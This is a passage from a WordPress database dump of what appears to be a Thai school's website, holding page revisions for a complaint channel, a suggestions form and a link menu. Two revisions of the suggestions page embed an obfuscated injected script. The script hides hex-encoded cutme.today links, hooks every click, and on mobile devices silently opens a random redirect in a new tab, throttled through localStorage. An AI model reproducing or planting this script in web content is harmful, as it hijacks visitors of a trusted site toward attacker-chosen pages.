33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/image {\"id\":1733,\"sizeSlug\":\"large\",\"link\":\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\",\"linkDestination\":\"custom\",\"uniqueID\":\"476_77c7af-0b\"} -->\n<figure class=\"wp-block-kadence-image kb-image476_77c7af-0b size-large\"><a href=\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\" class=\"kb-advanced-image-link\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/corruption-1024x256.png\" alt=\"\" class=\"kb-img wp-image-1733\"/></a></figure>\n<!-- /wp:kadence/image --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-07 14:08:20','2025-07-07 07:08:20','',476,'http://pakhaeng.ssk.in.th/?p=1734',0,'revision','',0),
(1735,1,'2025-07-07 14:14:10','2025-07-07 07:14:10','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ความคิดเห็นข้อเสนอแนะ','','inherit','closed','closed','','563-revision-v1','','','2025-07-07 14:14:10','2025-07-07 07:14:10','',563,'http://pakhaeng.ssk.in.th/?p=1735',0,'revision','',0),
(1736,1,'2025-07-07 14:14:46','2025-07-07 07:14:46','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ความคิดเห็นข้อเสนอแนะ','','inherit','closed','closed','','563-revision-v1','','','2025-07-07 14:14:46','2025-07-07 07:14:46','',563,'http://pakhaeng.ssk.in.th/?p=1736',0,'revision','',0),
(1738,1,'2025-07-07 14:18:54','2025-07-07 07:18:54','<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1733,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/corruption.png\" alt=\"\" class=\"wp-image-1733\"/></a></figure>\n<!-- /wp:image -->','ร้องเรียนทุจริต','','inherit','closed','closed','','1611-revision-v1','','','2025-07-07 14:18:54','2025-07-07 07:18:54','',1611,'http://pakhaeng.ssk.in.th/?p=1738',0,'revision','',0),
(1739,1,'2025-07-07 14:21:04','2025-07-07 07:21:04','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure 